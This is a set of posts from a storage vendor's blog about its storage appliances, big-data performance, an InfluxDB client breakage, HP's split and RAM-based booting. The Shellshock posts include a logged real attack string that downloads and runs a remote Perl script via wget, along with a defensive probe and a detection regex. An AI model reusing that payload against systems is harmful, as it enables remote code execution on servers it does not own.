Turnkey, low-cost, high-density: 1PB usable at 20+ GB/s sustained

It’s fully turnkey: we’d ship a rack with everything pre-installed and configured. Some de-palletizing is required, but after that it’s plug and play (power, disks). More details, and a sign-up to get a formal quote, are here.

This would fit in 24U of rack space for less than $0.18/raw GB, or $0.26/usable GB. It presents a single file system namespace with a single mount point. It leverages BeeGFS, and in addition to the native BeeGFS client, we have VMs to provide CIFS/SMB and NFS access.
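A quick back-of-the-envelope check on those price points, as a small Python sketch. It assumes (our assumption, not part of the quote) that both per-GB figures are ceilings on the same system price for the 960TB base configuration, and it uses decimal units (1 TB = 1000 GB). Under those assumptions the price ceiling is roughly $250K and the implied raw capacity is a bit under 1.4PB.

```python
# Back-of-the-envelope check of the quoted price points.
# Assumptions (ours): both per-GB prices are upper bounds on the SAME total
# system price, and capacities use decimal units (1 TB = 1000 GB).

RAW_PRICE_PER_GB = 0.18     # "less than $0.18/raw GB"
USABLE_PRICE_PER_GB = 0.26  # "less than $0.26/usable GB"
USABLE_TB = 960             # base configuration usable capacity


def price_ceiling(usable_tb: float, usable_price_per_gb: float) -> float:
    """Upper bound on system price implied by the per-usable-GB figure."""
    return usable_tb * 1000 * usable_price_per_gb


def implied_raw_tb(usable_tb: float, raw_price: float, usable_price: float) -> float:
    """Raw capacity implied if both per-GB figures describe the same price.

    total = raw_gb * raw_price = usable_gb * usable_price
    """
    return usable_tb * usable_price / raw_price


if __name__ == "__main__":
    total = price_ceiling(USABLE_TB, USABLE_PRICE_PER_GB)
    raw = implied_raw_tb(USABLE_TB, RAW_PRICE_PER_GB, USABLE_PRICE_PER_GB)
    print(f"price ceiling: ${total:,.0f}")
    print(f"implied raw capacity: ~{raw:,.0f} TB "
          f"(usable/raw = {USABLE_TB / raw:.0%})")
```

Since the quote says "less than", treat both results as bounds rather than exact figures.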

Oh, and it’s got native S3 object storage as well.

How hard is it to get working:

De-palletize it, slide the disks in, plug it in, turn on the manager nodes, and run the external config script (via web page, console, or serial port) to set up the network, passwords, and other bits. And off you go.

What sort of usable capacity:

960TB in the base configuration, scaling to many tens of PB.

What sort of performance:

~20GB/s streaming write performance, similar streaming read performance. Excellent metadata performance. Integrated flash cache for heavy IOP workloads.
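To put the streaming number in perspective, here is a rough Python estimate of how long it would take to fill the base configuration. It assumes decimal units and a perfectly sustained ~20GB/s, which is the best case; at that rate 960TB takes a little over 13 hours.

```python
# Rough time to fill the base configuration at the quoted streaming rate.
# Assumptions (ours): decimal units (1 TB = 1000 GB) and a perfectly
# sustained rate; small-file or metadata-heavy workloads will be slower.


def fill_time_hours(capacity_tb: float, rate_gb_per_s: float) -> float:
    """Hours needed to stream capacity_tb at rate_gb_per_s."""
    seconds = capacity_tb * 1000 / rate_gb_per_s
    return seconds / 3600


if __name__ == "__main__":
    print(f"{fill_time_hours(960, 20):.1f} hours")
```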

What sort of network connectivity:

1GbE, 10GbE, 40GbE, FDR InfiniBand. We provide an integrated 40GbE/InfiniBand fabric, which you may connect to your 10GbE/40GbE/InfiniBand network.

But I already have storage:

No problem: you can add this on, and we have a trade-in program. Contact us for more details.

But I need block based storage:

No problem, we provide high performance iSCSI/iSER/FCoE/SRP targets integrated into the unit.

But I need object based storage:

No problem, we include an S3 compatible object storage system.


Velocity matters

For more than a decade, the day job has been preaching that performance is an advantage, a feature you need, and a technological barrier for those with both inefficient infrastructure and a built-in resistance to addressing these issues. You usually find the latter at organizations whose purchasing groups dominate the users and the business owners.

The advent of big data (ok, what is this, the second or third time around now?), with data sets that keep pushing the performance capabilities of infrastructure, has put the exclamation point on this over the past few years. Big data is all about turning massive data sets into actionable intelligence, and enabling people to make use of the data that they’ve gathered.

Our argument has been, and remains, that the faster you can make your analytics, the larger the data sets you can analyze, the more frequently you can analyze them (more models per unit time), and the more accuracy you can obtain (more sophisticated and coupled models representing a more accurate and testable set of hypotheses).

Our voice was a lonely one in the wilderness for years, until the Data Mining/Business Intelligence/Big Data revolution was (re)born. Now, all of a sudden, we see article after article saying what we’ve been saying all along.

Here’s one at TechCrunch (yes, I know, but it’s still an OK high-level read). It was written by a KPCB person, so it has a built-in bias as to what is important. And who is important.

But points 8 and 9 matter.

8. Data is the new competitive advantage: The promise of Big Data is its power to bring new insights to light. Improved analytics have triggered new, non-obvious ideas about how businesses operate. For instance, InsideSales.com discovered that a sales rep who calls a lead back within 5 minutes of a request for information boosts the likelihood of closing a sale by 10X. By harnessing big data sets, companies will discover patterns like this for the first time.

Well, it used to be called Data Mining. Then Business Intelligence. Now Big Data. The idea is to analyze your data, build testable hypotheses, and iterate until you have enough of a sense of how things might play out to build a set of tactics that further a bigger-picture strategy. This is nothing new in one sense, but what’s new is that you can look at data at scale. And that starts opening up whole new vistas of inquiry.

9. Speed kills - your competitors: Faster application performance will distinguish the winners in enterprise. Studies by Walmart and Compuware show that one additional second of latency in application delivery can decrease revenue by 10 percent. An emerging set of companies is focused on speed: Instart Logic accelerates application delivery, AppDynamics monitors and helps address application response time, and PernixData and Fusion-io leverage flash-based storage to make data delivery many times faster.

Put a different way, you need performance to be able to respond to rapidly changing conditions. Obviously KPCB is biased about which of these matter, but the point is that there are products that can help make things go faster.

And at the end of the day, the most important aspect of being able to work with and gain insight from data is your ability to interact with the data, ask questions of it, construct testable hypotheses, and run many tests.

Which is why Scalable Informatics matters: the FastPath software-defined appliances combine the highest-performance hardware with the best and fastest software stacks for analytics.

Just an observation on this: it’s nice that the market as a whole has come around to our viewpoint.


And the 0.8.3 InfluxDB no longer works with the InfluxDB Perl module

I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and …

Yup, it’s borked.

So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler, more general time series database interface that will talk to InfluxDB, and eventually kdb+. Since I wanted to code for kdb+ as well, I am looking more seriously at the second option.

This means that, in the near term, influxdb-cli.pl is broken. I’ll work up a simple interface to InfluxDB via the LWP or Mojo user agents, and see what we can do from there. The longer-term idea is to put the db and analytics layer behind a common interface for us, one that won’t break (often).
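The shape of that common interface, sketched in Python for brevity (ours would sit on LWP or Mojo in Perl). All class and method names here are hypothetical. The InfluxDB backend assumes the 0.8-era HTTP write API (a POST of JSON series objects to `/db/<database>/series` with `u`/`p` credentials in the query string), so check it against your server before relying on it. It only builds the request; sending it is a separate step.

```python
import json
from abc import ABC, abstractmethod
from typing import Any, Sequence
from urllib.parse import quote, urlencode
from urllib.request import Request


class TimeSeriesDB(ABC):
    """Hypothetical backend-neutral interface; names are illustrative only."""

    @abstractmethod
    def write_request(self, series: str, columns: Sequence[str],
                      points: Sequence[Sequence[Any]]) -> Request:
        """Build (but do not send) an HTTP request that writes points."""


class InfluxDB08(TimeSeriesDB):
    """Backend ASSUMING InfluxDB 0.8's HTTP write API:
    POST /db/<database>/series?u=<user>&p=<password> with a JSON list of
    {"name", "columns", "points"} objects. Verify against your server."""

    def __init__(self, base_url: str, database: str, user: str, password: str):
        self.base_url = base_url.rstrip("/")
        self.database = database
        self.user = user
        self.password = password

    def write_request(self, series, columns, points):
        # One series object per call; each point is a row matching `columns`.
        body = [{
            "name": series,
            "columns": list(columns),
            "points": [list(p) for p in points],
        }]
        query = urlencode({"u": self.user, "p": self.password})
        url = f"{self.base_url}/db/{quote(self.database)}/series?{query}"
        return Request(url,
                       data=json.dumps(body).encode("utf-8"),
                       headers={"Content-Type": "application/json"},
                       method="POST")
```

Sending is then just `urllib.request.urlopen(db.write_request(...))`. A kdb+ backend would be another `TimeSeriesDB` subclass (possibly needing a transport other than HTTP, which this sketch does not cover), and callers would not need to change.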

Of course, the best of all possible worlds would be to figure out how to interface kdb+ as an engine for InfluxDB, which already supports a number of storage engines. Had I the time, I might look at that. Unfortunately, we just ditched the Go language from our toolchain (very long story: the language may be fine, but the environment and its ability to put code anywhere in a tree are so completely borked it’s not funny … even Java is easier/less dumb about things), so building it could be a problem for us.


A good read on a bootstrapped company

Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us.

There are significant market differences between us and them, but many of the things noted in the article are common truths.

  • If you don’t start with building a real company, you won’t have a real company.
  • The decisions you make when your own ass is on the line are very different from the ones you might make if it’s someone else’s ass, and money for that matter.
  • Economies turn, and if you are not rigged to survive, that is, if you can’t function without cash infusions, you will not likely survive.

That last point describes a large fraction of startups. I like the founder’s comments on VCs, survivorship bias, etc.

Definitely worth a read.


There are times

… when, during a support call, we see the magnitude of the self-inflicted damage and ask ourselves exactly why they did this to themselves.

Today was like this.

We do what we can to protect people from the dangerous rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades.

Yes, it’s a metaphor.

Today was a day of Pyrrhic victories. More like this …



massive unapologetic firepower part 2 … the dashboard …

For the Scalable Informatics Unison product.

The whole system:

Watching writes go by:

Note the sustained 40+ GB/s. This is a single rack sinking this data, with no SSDs in the bulk data storage path.

This dashboard is part of the day job’s FastPath product.


HP to split up

Interesting changes in the corporate M&A or disaggregation arena. With M&A, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead.

With a disaggregation, you slice off disparate portions of the business and set them free to pursue their own paths. This is what was rumored a few weeks ago with EMC: a possible split of the federated businesses. It could make sense if the businesses have no appreciable overlap, and there is more value in separate entities than in a federation. That is, if one or more of the entities is effectively prevented by internal politics from pursuing a better strategy or set of tactics, because it would rile up its federated partners.

So the latest rumor (and it may be more than a rumor at this stage) is that HP is looking to split. HP makes a little more than 20% of its revenue from printing, and 30% of its revenue from its personal systems. The rest of the business is in the enterprise systems, software, services.

This is a huge potential split. I’d guess that they realized in their discussions with EMC that they’d have to split the organization to better focus on the enterprise, which to a degree explains why HP didn’t jump at the chance (though it’s also quite possible that EMC was asking too high a price).

Further, I’d bet that a number of others have been shopping themselves around. But an HP that isn’t focused won’t likely do anyone any good.

So this is interesting to say the least, but it raises questions on a number of things. HP has switching, servers, storage, services, etc. on the enterprise side. I am assuming all would remain. Would this disaggregated company seek to remain independent, or sell itself to someone else (say a Quanta or someone like that)? Would the PC and printing unit do something like that?

We live in interesting times.


Shellshock is worse than Heartbleed

In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits.

Even with the latest patched source, built from scratch, there are active working compromises.

With Heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, and cross our fingers.

This is worse, in that the fixes … well … don’t.
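For checking your own machines, here is a minimal Python sketch of the widely circulated test for the original bug (CVE-2014-6271). It only probes that first CVE; the follow-on issues (CVE-2014-7169 and friends) that the early patches missed need their own tests, so a clean result here does not mean you are safe. The function name is ours.

```python
import shutil
import subprocess
from typing import Optional


def bash_vulnerable_to_cve_2014_6271(bash_path: Optional[str] = None) -> Optional[bool]:
    """Classic Shellshock probe for CVE-2014-6271 ONLY.

    Returns True if the trailing command ran, False if it did not, and
    None if no bash could be found on PATH.
    """
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return None
    # A vulnerable bash executes the command after the function body when
    # it imports a function definition from the environment at startup.
    env = {"x": "() { :;}; echo VULNERABLE"}
    result = subprocess.run([bash, "-c", "echo probe"], env=env,
                            capture_output=True, text=True, timeout=10)
    return "VULNERABLE" in result.stdout


if __name__ == "__main__":
    print(bash_vulnerable_to_cve_2014_6271())
```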

Many, many years ago, I began my Unix journey on UNICOS on a Cray X-MP or Y-MP at the Pittsburgh Supercomputing Center, running some code to generate MD trajectories and energies. I hated the native shell, so I pulled down tcsh and built it, storing it in the small local space they gave researchers. It made using the CLI tolerable.

In the late 90s I switched to bash as this is what Linux used as its default, and I was working mostly on Linux by the end of that decade.

I am thinking of switching back to tcsh (though this could be vulnerable as well, albeit to different exploits).



… and the shell shock attempts continue …

From (174-143-168-121.static.cloud-ips.com)

Request: '() { :;}; /bin/bash -c "wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache"'
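If you want to pull these out of your own logs, a minimal Python sketch. The attack relies on bash importing anything that starts with `() {` from an environment variable, and CGI exports request headers as environment variables, so matching that prefix in logged request fields catches this probe and its variants. The pattern and function names are ours, and the match is deliberately loose, so expect the occasional false positive.

```python
import re
from typing import Iterable, List

# Bash function definitions exported via the environment begin with "() {"
# (whitespace between ")" and "{" varies between probe variants).
SHELLSHOCK_PATTERN = re.compile(r"\(\)\s*\{")


def looks_like_shellshock(value: str) -> bool:
    """True if a logged request field carries a bash function-definition prefix."""
    return bool(SHELLSHOCK_PATTERN.search(value))


def flag_requests(lines: Iterable[str]) -> List[str]:
    """Return only the log lines that look like Shellshock probes."""
    return [line for line in lines if looks_like_shellshock(line)]
```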


Updated boot tech in Scalable OS (SIOS)

This is an itch we’ve been scratching a few different ways, and it’s very much related to forgoing distro-based installers.

Ok, first the back story.

One of the things that has always annoyed me about installing systems is the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware or software. It’s a pathway that can fail. And when it fails, all hell breaks loose.

This has troubled me for many years, and it is why tiburon, now SIOS, is the technology we’ve developed to solve this problem.

It turns out when you solve this problem you solve many others sort of automatically. But you also create a few.

The question of balance, which set of problems you want, and how you solve them, is what matters.

For a long time, we’ve been using NFS-based OS management in the Unison storage system, as well as in our FastPath big data appliances. This makes creating new appliances as simple as installing and booting the hardware or VM. In fact, we’ve done quite a bit of debugging of odd customer software stacks in VMs set up like this.

But the NFS model presupposes a fully operational NFS server available at all times. This is doable with a fail-over model, though the NFS server is a potential single point of failure if it isn’t implemented as HA NFS.

The model we’ve been working towards for a long time is a correctly functioning, complete appliance OS that runs entirely out of RAM, but PXE boots the kernel/initrd, and then possibly grabs a full OS image.

We want to specify the OS on the PXE command line, as SIOS (aka tiburon) provides a database-backed configuration mechanism, presented as a trivial web-based API. We want all the parts of this served by PXE and http.

Well, last week we took a major step towards the full version of this.

root@unison:~# cat /proc/cmdline 
root=ram BOOT_DEBUG=2 rw debug verbose console=tty0 console=ttyS1,115200n8 ip=::::diskless:eth0:dhcp ipv6.disable=1 debug rootfstype=ramdisk verbose

root@unison:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
rootfs          8.0G  2.5G  5.6G  31% /
udev             10M     0   10M   0% /dev
tmpfs            16M  360K   16M   3% /run
tmpfs           8.0G  2.5G  5.6G  31% /
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs            19G     0   19G   0% /run/shm
tmpfs           4.0G     0  4.0G   0% /tmp
tmpfs           4.0G     0  4.0G   0% /var/tmp
tmpfs            16K  4.0K   12K  25% /var/lib/nfs
tmpfs           1.0M     0  1.0M   0% /data

Notice what is completely missing from the kernel boot command line. Hint: it’s the root=… stuff. Hell, I could even get rid of the ip=:::: bit.
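Checking that by script rather than by eye is easy enough. A minimal Python sketch (function names are ours) that splits a kernel command line like the one shown into parameters and reports whether `root=` points at a block device, which we take to mean a `/dev/` path or a `UUID=`, `LABEL=` or `PARTUUID=` reference. It does not handle quoted values containing spaces.

```python
from collections import defaultdict
from typing import Dict, List

# What we treat as "root on a block device" (an assumption for this sketch).
BLOCK_DEVICE_PREFIXES = ("/dev/", "UUID=", "LABEL=", "PARTUUID=")


def parse_cmdline(cmdline: str) -> Dict[str, List[str]]:
    """Split a kernel command line into key -> list of values.

    Bare flags such as 'debug' get an empty-string value; repeated keys
    (e.g. two console= entries) keep every value in order.
    """
    params: Dict[str, List[str]] = defaultdict(list)
    for token in cmdline.split():
        # Split on the FIRST '=', so root=UUID=... keeps its full value.
        key, sep, value = token.partition("=")
        params[key].append(value if sep else "")
    return dict(params)


def root_on_block_device(params: Dict[str, List[str]]) -> bool:
    """True if any root= value refers to a disk rather than RAM."""
    return any(v.startswith(BLOCK_DEVICE_PREFIXES) for v in params.get("root", []))


if __name__ == "__main__":
    with open("/proc/cmdline") as f:
        params = parse_cmdline(f.read())
    print("root on block device:", root_on_block_device(params))
```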

The rootfstype=ramdisk currently uses a hardwired snapshot of a pre-installed file system. But the way we have this written, we can fetch a specific image by adding in something akin to


for appropriate values of $URL. The $URL can be on the high-performance network, so grabbing, say, a 1GB image over a 10GbE or IB network should be pretty quick.

We could do iSCSI, or FCoE, or SRP, or iSER, or … whatever we want if we need to attach an external block device, though given our concern with the extended failure domain and failure surface, we’d prefer the ramdisk boot.

We can have the system fall back to the pre-defined OS load if the rootimage fails. The booting itself can be HA.
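The fetch-with-fallback behavior described here, as a minimal Python sketch. The real logic lives in the SIOS initrd and isn't shown in this post, so the function name and the idea of passing a list of image URLs (one way to make the image serving HA) are our assumptions. It tries each URL in order and returns the built-in snapshot only if every fetch fails or comes back empty.

```python
import http.client
import urllib.request
from typing import Iterable


def fetch_root_image(urls: Iterable[str], fallback: bytes,
                     timeout: float = 30.0) -> bytes:
    """Try each image URL in turn; return the built-in snapshot if all fail."""
    for url in urls:
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                data = resp.read()
        except (OSError, ValueError, http.client.HTTPException):
            # OSError covers URLError and socket errors; ValueError covers
            # malformed URLs. Either way, move on to the next server.
            continue
        if data:
            return data  # treat an empty response as a failure
    return fallback
```

Listing several image servers is what makes the fetch tolerant of any one of them being down; the hardwired snapshot is the last resort.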

So we can have a much simpler-to-set-up HA http server handing images and config to nodes, as well as a redundant set of PXE servers, all far easier to configure, at far lower cost, and with far greater scalability. This will work beautifully at web scale, as all aspects of the system are fully distributable.

Couple this with our config server and automated post-boot config system, and this is becoming quite exciting as a product in and of itself.

More soon, but this is quite exciting!

